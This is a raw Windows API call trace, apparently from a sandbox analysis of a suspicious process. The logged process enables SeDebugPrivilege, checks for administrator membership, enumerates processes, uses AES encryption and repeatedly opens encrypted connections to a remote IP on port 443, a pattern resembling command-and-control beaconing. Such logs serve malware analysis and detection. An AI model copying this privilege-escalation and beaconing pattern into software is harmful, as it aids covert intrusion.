	[0069.109] GetTokenInformation (in: TokenHandle=0x9dc, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x350199d388 | out: TokenInformation=0x0, ReturnLength=0x350199d388) returned 0
	[0069.109] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x233fc6449c0
	[0069.109] GetTokenInformation (in: TokenHandle=0x9dc, TokenInformationClass=0x8, TokenInformation=0x233fc6449c0, TokenInformationLength=0x4, ReturnLength=0x350199d388 | out: TokenInformation=0x233fc6449c0, ReturnLength=0x350199d388) returned 1
	[0069.109] CheckTokenMembership (in: TokenHandle=0x9e8, SidToCheck=0x233e45782b0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x350199d4f8 | out: IsMember=0x350199d4f8) returned 1
	[0069.122] GetCurrentProcessId () returned 0xd94
	[0069.160] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x350199c980 | out: lpLuid=0x350199c980*(LowPart=0x14, HighPart=0)) returned 1
	[0069.161] GetCurrentProcess () returned 0xffffffffffffffff
	[0069.161] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x350199c9a0 | out: TokenHandle=0x350199c9a0*=0x688) returned 1
	[0069.162] AdjustTokenPrivileges (in: TokenHandle=0x688, DisableAllPrivileges=0, NewState=0x233e45bc4f8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0069.163] CloseHandle (hObject=0x688) returned 1
	[0069.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x233f3f5b070, Length=0x20000, ResultLength=0x350199d910 | out: SystemInformation=0x233f3f5b070, ResultLength=0x350199d910*=0x233000166e0) returned 0x0
	[0069.170] CryptContextAddRef (hProv=0x233fc6ef360, pdwReserved=0x0, dwFlags=0x0) returned 1
	[0069.170] CryptDuplicateKey (in: hKey=0x233fc675180, pdwReserved=0x0, dwFlags=0x0, phKey=0x350199d758 | out: phKey=0x350199d758*=0x233fc676300) returned 1
	[0069.170] CryptContextAddRef (hProv=0x233fc6ef360, pdwReserved=0x0, dwFlags=0x0) returned 1
	[0069.170] CryptSetKeyParam (hKey=0x233fc676300, dwParam=0x4, pbData=0x233e45e7e40*=0x1, dwFlags=0x0) returned 1
	[0069.170] CryptSetKeyParam (hKey=0x233fc676300, dwParam=0x1, pbData=0x233e45e7df0, dwFlags=0x0) returned 1
	[0069.170] CryptEncrypt (in: hKey=0x233fc676300, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x233e45e88e0*, pdwDataLen=0x350199d868*=0x90, dwBufLen=0x90 | out: pbData=0x233e45e88e0*, pdwDataLen=0x350199d868*=0x90) returned 1
	[0069.171] CryptEncrypt (in: hKey=0x233fc676300, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x233e45e89a8*, pdwDataLen=0x350199d868*=0x0, dwBufLen=0x10 | out: pbData=0x233e45e89a8*, pdwDataLen=0x350199d868*=0x10) returned 1
	[0069.194] select (in: nfds=0, readfds=0x233e495f208, writefds=0x0, exceptfds=0x0, timeout=0x350199d500 | out: readfds=0x233e495f208, writefds=0x0, exceptfds=0x0) returned 0
	[0069.194] EncryptMessage (in: phContext=0x350199d090, fQOP=0x0, pMessage=0x233e495fcd0, MessageSeqNo=0x0 | out: pMessage=0x233e495fcd0) returned 0x0
	[0069.195] send (in: s=0x7cc, buf=0x233e495fac8*, len=245, flags=0 | out: buf=0x233e495fac8*) returned 245
	[0069.195] EncryptMessage (in: phContext=0x350199d210, fQOP=0x0, pMessage=0x233e495fff0, MessageSeqNo=0x0 | out: pMessage=0x233e495fff0) returned 0x0
	[0069.195] send (in: s=0x7cc, buf=0x233e495fdf8*, len=229, flags=0 | out: buf=0x233e495fdf8*) returned 229
	[0069.195] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0069.195] recv (in: s=0x7cc, buf=0x233e435a700, len=5, flags=0 | out: buf=0x233e435a700*) returned 5
	[0069.854] recv (in: s=0x7cc, buf=0x233e435a705, len=272, flags=0 | out: buf=0x233e435a705*) returned 272
	[0069.854] DecryptMessage (in: phContext=0x350199d0e0, pMessage=0x233e4960298, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e4960298, pfQOP=0x0) returned 0x0
	[0069.854] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0069.854] recv (in: s=0x7cc, buf=0x233e435a700, len=5, flags=0 | out: buf=0x233e435a700*) returned 5
	[0069.854] recv (in: s=0x7cc, buf=0x233e4973ba5, len=8224, flags=0 | out: buf=0x233e4973ba5*) returned 8224
	[0069.855] DecryptMessage (in: phContext=0x350199d090, pMessage=0x233e4975cd8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e4975cd8, pfQOP=0x0) returned 0x0
	[0069.855] recv (in: s=0x7cc, buf=0x233e4973ba0, len=5, flags=0 | out: buf=0x233e4973ba0*) returned 5
	[0069.947] recv (in: s=0x7cc, buf=0x233e4973ba5, len=8224, flags=0 | out: buf=0x233e4973ba5*) returned 2899
	[0069.947] recv (in: s=0x7cc, buf=0x233e49746f8, len=5325, flags=0 | out: buf=0x233e49746f8*) returned 5325
	[0069.958] DecryptMessage (in: phContext=0x350199d090, pMessage=0x233e4975ec8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e4975ec8, pfQOP=0x0) returned 0x0
	[0069.959] recv (in: s=0x7cc, buf=0x233e4973ba0, len=5, flags=0 | out: buf=0x233e4973ba0*) returned 5
	[0069.959] recv (in: s=0x7cc, buf=0x233e4973ba5, len=8224, flags=0 | out: buf=0x233e4973ba5*) returned 1930
	[0069.959] recv (in: s=0x7cc, buf=0x233e497432f, len=6294, flags=0 | out: buf=0x233e497432f*) returned 6294
	[0069.960] DecryptMessage (in: phContext=0x350199d090, pMessage=0x233e49760b8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e49760b8, pfQOP=0x0) returned 0x0
	[0069.960] recv (in: s=0x7cc, buf=0x233e4973ba0, len=5, flags=0 | out: buf=0x233e4973ba0*) returned 5
	[0069.960] recv (in: s=0x7cc, buf=0x233e4973ba5, len=8224, flags=0 | out: buf=0x233e4973ba5*) returned 961
	[0069.960] recv (in: s=0x7cc, buf=0x233e4973f66, len=7263, flags=0 | out: buf=0x233e4973f66*) returned 7263
	[0070.206] DecryptMessage (in: phContext=0x350199d090, pMessage=0x233e49762a8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e49762a8, pfQOP=0x0) returned 0x0
	[0070.206] recv (in: s=0x7cc, buf=0x233e4973ba0, len=5, flags=0 | out: buf=0x233e4973ba0*) returned 5
	[0070.206] recv (in: s=0x7cc, buf=0x233e4973ba5, len=5584, flags=0 | out: buf=0x233e4973ba5*) returned 5584
	[0070.206] DecryptMessage (in: phContext=0x350199d090, pMessage=0x233e4976498, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e4976498, pfQOP=0x0) returned 0x0
	[0070.206] SetEvent (hEvent=0x6b4) returned 1
	[0070.332] CoTaskMemAlloc (cb=0x104) returned 0x233fc7094d0
	[0070.332] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233fc7094d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0070.332] CoTaskMemFree (pv=0x233fc7094d0) 
	[0070.380] CoTaskMemAlloc (cb=0x104) returned 0x233fc7083d0
	[0070.380] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233fc7083d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0070.380] CoTaskMemFree (pv=0x233fc7083d0) 
	[0070.384] CoTaskMemAlloc (cb=0x104) returned 0x233fc7080a0
	[0070.384] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233fc7080a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0070.384] CoTaskMemFree (pv=0x233fc7080a0) 
	[0070.387] CryptAcquireContextW (in: phProv=0x350199ba70, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x350199ba70*=0x233fc6f0960) returned 1
	[0070.389] CryptImportKey (in: hProv=0x233fc6f0960, pbData=0x233e4bd1760, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x350199caa8 | out: phKey=0x350199caa8*=0x233fc674d90) returned 1
	[0070.389] CryptContextAddRef (hProv=0x233fc6f0960, pdwReserved=0x0, dwFlags=0x0) returned 1
	[0070.392] CryptContextAddRef (hProv=0x233fc6f0960, pdwReserved=0x0, dwFlags=0x0) returned 1
	[0070.392] CryptDuplicateKey (in: hKey=0x233fc674d90, pdwReserved=0x0, dwFlags=0x0, phKey=0x350199c788 | out: phKey=0x350199c788*=0x233fc6757a0) returned 1
	[0070.392] CryptContextAddRef (hProv=0x233fc6f0960, pdwReserved=0x0, dwFlags=0x0) returned 1
	[0070.392] CryptSetKeyParam (hKey=0x233fc6757a0, dwParam=0x4, pbData=0x233e4bd3040*=0x1, dwFlags=0x0) returned 1
	[0070.392] CryptSetKeyParam (hKey=0x233fc6757a0, dwParam=0x1, pbData=0x233e4bd2ff0, dwFlags=0x0) returned 1
	[0070.550] CryptDecrypt (in: hKey=0x233fc6757a0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x233e48f55a8, pdwDataLen=0x350199ca38 | out: pbData=0x233e48f55a8, pdwDataLen=0x350199ca38) returned 1
	[0070.550] CryptDecrypt (in: hKey=0x233fc6757a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x233e4908138, pdwDataLen=0x350199ca28 | out: pbData=0x233e4908138, pdwDataLen=0x350199ca28) returned 0
	[0070.617] VirtualQuery (in: lpAddress=0x199c9f0, lpBuffer=0x350199d8b0, dwLength=0x30 | out: lpBuffer=0x350199d8b0*(BaseAddress=0x199c000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5b2e4000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0070.620] VirtualQuery (in: lpAddress=0x199bc20, lpBuffer=0x350199cae0, dwLength=0x30 | out: lpBuffer=0x350199cae0*(BaseAddress=0x199b000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5b2e5000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0070.620] VirtualQuery (in: lpAddress=0x199bc20, lpBuffer=0x350199cae0, dwLength=0x30 | out: lpBuffer=0x350199cae0*(BaseAddress=0x199b000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5b2e5000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0070.623] VirtualQuery (in: lpAddress=0x199aed0, lpBuffer=0x350199bd90, dwLength=0x30 | out: lpBuffer=0x350199bd90*(BaseAddress=0x199a000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5b2e6000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0070.623] VirtualQuery (in: lpAddress=0x199aed0, lpBuffer=0x350199bd90, dwLength=0x30 | out: lpBuffer=0x350199bd90*(BaseAddress=0x199a000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5b2e6000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0070.632] VirtualQuery (in: lpAddress=0x199b070, lpBuffer=0x350199bf30, dwLength=0x30 | out: lpBuffer=0x350199bf30*(BaseAddress=0x199b000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5b2e5000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0070.762] CoTaskMemAlloc (cb=0x104) returned 0x233fc6f3820
	[0070.762] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233fc6f3820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0070.762] CoTaskMemFree (pv=0x233fc6f3820) 
	[0070.763] CoTaskMemAlloc (cb=0x104) returned 0x233fc6f3820
	[0070.763] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233fc6f3820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0070.763] CoTaskMemFree (pv=0x233fc6f3820) 
	[0070.923] CoTaskMemAlloc (cb=0x104) returned 0x233fc6f2d80
	[0070.923] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233fc6f2d80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0070.923] CoTaskMemFree (pv=0x233fc6f2d80) 
	[0070.937] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9c8
	[0087.541] CloseHandle (hObject=0x9c8) returned 1
	[0087.764] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c270 | out: phkResult=0x350199c270*=0x9c8) returned 0x0
	[0087.764] RegOpenKeyExW (in: hKey=0x9c8, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c158 | out: phkResult=0x350199c158*=0xa50) returned 0x0
	[0087.764] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa4c
	[0087.765] RegNotifyChangeKeyValue (hKey=0xa50, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa4c, fAsynchronous=1) returned 0x0
	[0087.765] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c180 | out: phkResult=0x350199c180*=0xa70) returned 0x0
	[0087.765] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa68
	[0087.765] RegNotifyChangeKeyValue (hKey=0xa70, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa68, fAsynchronous=1) returned 0x0
	[0087.766] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c180 | out: phkResult=0x350199c180*=0xa60) returned 0x0
	[0087.766] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa58
	[0087.766] RegNotifyChangeKeyValue (hKey=0xa60, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa58, fAsynchronous=1) returned 0x0
	[0087.766] GetCurrentProcess () returned 0xffffffffffffffff
	[0087.766] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c0e8 | out: TokenHandle=0x350199c0e8*=0xa5c) returned 1
	[0087.766] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc689300
	[0087.766] WinHttpSetTimeouts (hInternet=0x233fc689300, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0087.767] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c1c8 | out: pProxyConfig=0x350199c1c8) returned 1
	[0087.798] SetEvent (hEvent=0x6b4) returned 1
	[0087.799] select (in: nfds=0, readfds=0x233e4b705a8, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e4b705a8, writefds=0x0, exceptfds=0x0) returned 1
	[0087.804] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0087.809] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0087.811] shutdown (s=0x7cc, how=2) returned 0
	[0087.812] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0087.812] closesocket (s=0x7cc) returned 0
	[0087.813] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0087.813] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9e8
	[0087.814] WSAConnect (in: s=0x7cc, name=0x233e4b71ec8*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0087.924] closesocket (s=0x9e8) returned 0
	[0087.925] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e4b6ece8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e4b72750, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e4b72750, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0087.926] FreeContextBuffer (in: pvContextBuffer=0x233fc6865f0 | out: pvContextBuffer=0x233fc6865f0) returned 0x0
	[0087.926] send (in: s=0x7cc, buf=0x233e4b72820*, len=333, flags=0 | out: buf=0x233e4b72820*) returned 333
	[0087.926] recv (in: s=0x7cc, buf=0x233e4b72820, len=5, flags=0 | out: buf=0x233e4b72820*) returned 5
	[0088.031] recv (in: s=0x7cc, buf=0x233e4b72825, len=49, flags=0 | out: buf=0x233e4b72825*) returned 49
	[0088.032] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e4b6ece8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4b72a60, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e4b72a80, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e4b72a80, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0088.033] recv (in: s=0x7cc, buf=0x233e4b72b70, len=5, flags=0 | out: buf=0x233e4b72b70*) returned 5
	[0088.033] recv (in: s=0x7cc, buf=0x233e4b72b95, len=1, flags=0 | out: buf=0x233e4b72b95*) returned 1
	[0088.033] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e4b6ece8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4b72c68, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e4b72c88, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e4b72c88, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0088.033] recv (in: s=0x7cc, buf=0x233e4b72d78, len=5, flags=0 | out: buf=0x233e4b72d78*) returned 5
	[0088.033] recv (in: s=0x7cc, buf=0x233e4b72d9d, len=48, flags=0 | out: buf=0x233e4b72d9d*) returned 48
	[0088.033] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e4b6ece8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4b72ea0, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e4b72ec0, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e4b72ec0, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0088.034] FreeContextBuffer (in: pvContextBuffer=0x233e399c1c0 | out: pvContextBuffer=0x233e399c1c0) returned 0x0
	[0088.034] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e4b73030 | out: pBuffer=0x233e4b73030) returned 0x0
	[0088.035] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e4b73088 | out: pBuffer=0x233e4b73088) returned 0x0
	[0088.035] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e4b730f0 | out: pBuffer=0x233e4b730f0) returned 0x0
	[0088.035] CertDuplicateCertificateContext (pCertContext=0x233fc67ffb0) returned 0x233fc67ffb0
	[0088.036] CertDuplicateStore (hCertStore=0x233fc683760) returned 0x233fc683760
	[0088.036] CertEnumCertificatesInStore (hCertStore=0x233fc683760, pPrevCertContext=0x0) returned 0x233fc67ffb0
	[0088.036] CertDuplicateCertificateContext (pCertContext=0x233fc67ffb0) returned 0x233fc67ffb0
	[0088.036] CertEnumCertificatesInStore (hCertStore=0x233fc683760, pPrevCertContext=0x233fc67ffb0) returned 0x0
	[0088.036] CertCloseStore (hCertStore=0x233fc683760, dwFlags=0x0) returned 1
	[0088.036] CertFreeCertificateContext (pCertContext=0x233fc67ffb0) returned 1
	[0088.037] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc6834f0
	[0088.037] CertAddCRLLinkToStore (in: hCertStore=0x233fc6834f0, pCrlContext=0x233fc67ffb0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0088.038] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc67ffb0, pTime=0x350199b4c8, hAdditionalStore=0x233fc6834f0, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0088.042] CertDuplicateCertificateChain (pChainContext=0x233e39caa40) returned 0x233e39caa40
	[0088.044] CertDuplicateCertificateContext (pCertContext=0x233fc67ffb0) returned 0x233fc67ffb0
	[0088.045] CertDuplicateCertificateContext (pCertContext=0x233fc6807b0) returned 0x233fc6807b0
	[0088.046] CertDuplicateCertificateContext (pCertContext=0x233fc680830) returned 0x233fc680830
	[0088.046] CertFreeCertificateChain (pChainContext=0x233e39caa40) 
	[0088.046] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233e39caa40, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0088.046] SetLastError (dwErrCode=0x0) 
	[0088.046] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233e39caa40, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0088.046] CertFreeCertificateChain (pChainContext=0x233e39caa40) 
	[0088.047] CertFreeCertificateContext (pCertContext=0x233fc67ffb0) returned 1
	[0088.048] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e4b75cf8, MessageSeqNo=0x0 | out: pMessage=0x233e4b75cf8) returned 0x0
	[0088.049] CoTaskMemAlloc (cb=0x20) returned 0x233fc64fd50
	[0088.049] WSASend (in: s=0x7cc, lpBuffers=0x233fc64fd50*=((len=0x3b, buf=0x233e4b72f90*), (len=0xd5, buf=0x233e4b75b00*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc64fd50*=((len=0x3b, buf=0x233e4b72f90*), (len=0xd5, buf=0x233e4b75b00*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0088.049] CoTaskMemFree (pv=0x233fc64fd50) 
	[0088.050] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0088.050] recv (in: s=0x7cc, buf=0x233e4b75ed8, len=5, flags=0 | out: buf=0x233e4b75ed8*) returned 5
	[0088.978] recv (in: s=0x7cc, buf=0x233e4b75efd, len=1488, flags=0 | out: buf=0x233e4b75efd*) returned 1488
	[0088.979] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e4b765e0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e4b765e0, pfQOP=0x0) returned 0x0
	[0088.980] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0088.980] SetEvent (hEvent=0x6b4) returned 1
	[0089.242] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9c8
	[0108.420] CloseHandle (hObject=0x9c8) returned 1
	[0109.715] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0xe4) returned 0x0
	[0109.715] RegOpenKeyExW (in: hKey=0xe4, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0x384) returned 0x0
	[0109.716] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9c8
	[0109.716] RegNotifyChangeKeyValue (hKey=0x384, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9c8, fAsynchronous=1) returned 0x0
	[0109.716] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x9bc) returned 0x0
	[0109.716] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa50
	[0109.716] RegNotifyChangeKeyValue (hKey=0x9bc, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa50, fAsynchronous=1) returned 0x0
	[0109.716] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa4c) returned 0x0
	[0109.717] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa70
	[0109.719] RegNotifyChangeKeyValue (hKey=0xa4c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa70, fAsynchronous=1) returned 0x0
	[0109.719] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0xa68) returned 1
	[0109.720] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc68aea0
	[0109.720] WinHttpSetTimeouts (hInternet=0x233fc68aea0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0109.720] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0109.786] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199be98 | out: TokenHandle=0x350199be98*=0xa58) returned 1
	[0109.793] RegNotifyChangeKeyValue (hKey=0x738, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x73c, fAsynchronous=1) returned 0x0
	[0109.795] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199be28 | out: TokenHandle=0x350199be28*=0xa5c) returned 1
	[0109.795] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199bed8 | out: pProxyConfig=0x350199bed8) returned 1
	[0109.802] SetEvent (hEvent=0x6b4) returned 1
	[0109.803] select (in: nfds=0, readfds=0x233e483b7f8, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e483b7f8, writefds=0x0, exceptfds=0x0) returned 1
	[0109.803] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0109.804] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0109.805] shutdown (s=0x7cc, how=2) returned 0
	[0109.806] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0109.806] closesocket (s=0x7cc) returned 0
	[0109.806] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0109.807] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0xa74
	[0109.807] WSAConnect (in: s=0x7cc, name=0x233e483cfc0*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0109.915] closesocket (s=0xa74) returned 0
